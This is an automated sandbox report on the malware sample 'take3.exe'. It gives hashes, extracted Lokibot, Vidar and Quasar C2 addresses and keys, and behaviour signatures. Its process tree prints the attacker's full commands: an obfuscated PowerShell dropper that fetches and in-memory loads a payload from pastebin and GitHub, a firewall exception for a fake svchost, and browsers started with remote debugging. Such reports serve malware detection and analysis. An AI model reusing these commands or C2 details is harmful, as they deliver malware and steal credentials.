Analysis

  • max time kernel
    140s
  • max time network
    119s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-11-2024 01:53

General

  • Target

    take3.exe

  • Size

    14.3MB

  • MD5

    84c0ea78eb89b7abee5e03ae8ee708e4

  • SHA1

    91339bd35bd8f01868b8ff39d57b2f07fb050a0b

  • SHA256

    9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53

  • SHA512

    ca66588967874065481bbe80c262c55b3c831e3c95a1fb8830581765cc3dbeaa9d5608823aee899de316be9323a986e6866d399f9950af22e37efb527476436f

  • SSDEEP

    393216:KOWd863huc1dQJlAwF3MnG3InVFedWm7NS/xHWgnHz:b893hr1dQ53MG4VAHsT

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Family

lokibot

C2

http://frojbdawmiojfg.sytes.net:4410/fujfygidj/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

vidar

Version

10.6

Botnet

af458cf23e4b27326a35871876cc63d9

C2

https://steamcommunity.com/profiles/76561199747278259

https://t.me/armad2a

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

C2

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes
  • encryption_key

    09BBDA8FF0524296F02F8F81158F33C0AA74D487

  • install_name

    User Application Data.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windowns Client Startup

  • subdirectory

    Quasar

Signatures

  • Detect Vidar Stealer 1 IoCs
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Njrat family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 53 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 28 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 4 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3264
      • C:\Users\Admin\AppData\Local\Temp\take3.exe
        "C:\Users\Admin\AppData\Local\Temp\take3.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2476
        • C:\Users\Admin\AppData\Local\Temp\take3.exe
          "C:\Users\Admin\AppData\Local\Temp\take3.exe"
          3⤵
          • Loads dropped DLL
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3516
          • C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
            "C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1660
            • C:\Users\Admin\AppData\Roaming\svchost.exe
              "C:\Users\Admin\AppData\Roaming\svchost.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4524
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
                6⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:3848
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4160
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bo☹G4☹a☹Bu☹HY☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹awBq☹GE☹dwBz☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹GE☹bwB1☹GY☹c☹☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹YQBv☹HU☹ZgBw☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹JwBj☹G0☹cg☹x☹HY☹cw☹v☹G4☹aQBh☹G0☹LwBz☹GQ☹YQBl☹Gg☹LwBz☹GY☹ZQBy☹C8☹ZQBy☹Gk☹Zg☹v☹GE☹b☹Bs☹Gk☹dQBx☹G4☹YQBy☹HI☹YQBi☹DQ☹Mg☹w☹DI☹bgBv☹Gk☹c☹Bt☹GE☹a☹Bj☹C8☹bQBv☹GM☹LgB0☹G4☹ZQB0☹G4☹bwBj☹HI☹ZQBz☹HU☹YgB1☹Gg☹d☹Bp☹Gc☹LgB3☹GE☹cg☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Gs☹agBh☹Hc☹cw☹g☹Cw☹I☹☹n☹Hc☹aQBu☹DY☹N☹Bi☹Gk☹d☹☹n☹Cw☹I☹☹k☹Gg☹bgBo☹G4☹dg☹s☹C☹☹Jw☹x☹Cc☹L☹☹g☹Cc☹UgBv☹GQ☹YQ☹n☹C☹☹KQ☹p☹Ds☹';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs');powershell $Yolopolhggobek;
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2940
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hnhnv = '0' ;$kjaws = 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs' ;[Byte[]] $aoufp = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($aoufp).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('cmr1vs/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $kjaws , 'win64bit', $hnhnv, '1', 'Roda' ));"
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3124
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c
                  7⤵
                    PID:860
                  • C:\Windows\system32\PING.EXE
                    "C:\Windows\system32\PING.EXE" 127.0.0.1
                    7⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:2880
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4408
            • C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
              "C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2372
              • C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
                C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
                5⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:3100
              • C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
                C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
                5⤵
                • Executes dropped EXE
                PID:4576
              • C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
                C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
                5⤵
                • Executes dropped EXE
                PID:4516
            • C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
              "C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:4912
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 764
                5⤵
                • Program crash
                PID:4752
            • C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe
              "C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe"
              4⤵
              • Executes dropped EXE
              PID:4540
            • C:\Users\Admin\Downloads\UrlHausFiles\bp.exe
              "C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"
              4⤵
              • Executes dropped EXE
              PID:3544
            • C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
              "C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3756
            • C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
              "C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4892
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                5⤵
                • Uses browser remote debugging
                • Drops file in Windows directory
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:4120
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe070acc40,0x7ffe070acc4c,0x7ffe070acc58
                  6⤵
                    PID:3344
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1780,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2
                    6⤵
                      PID:3328
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1976,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3
                      6⤵
                        PID:2404
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:8
                        6⤵
                          PID:2880
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:228
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:3996
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:4708
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:8
                          6⤵
                            PID:1944
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
                            6⤵
                              PID:2428
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
                              6⤵
                                PID:2480
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5168,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5164 /prefetch:8
                                6⤵
                                  PID:5048
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8
                                  6⤵
                                    PID:1940
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5312 /prefetch:8
                                    6⤵
                                      PID:3920
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5352,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5216 /prefetch:2
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:1844
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                    5⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    PID:884
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe070b3cb8,0x7ffe070b3cc8,0x7ffe070b3cd8
                                      6⤵
                                        PID:4852
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
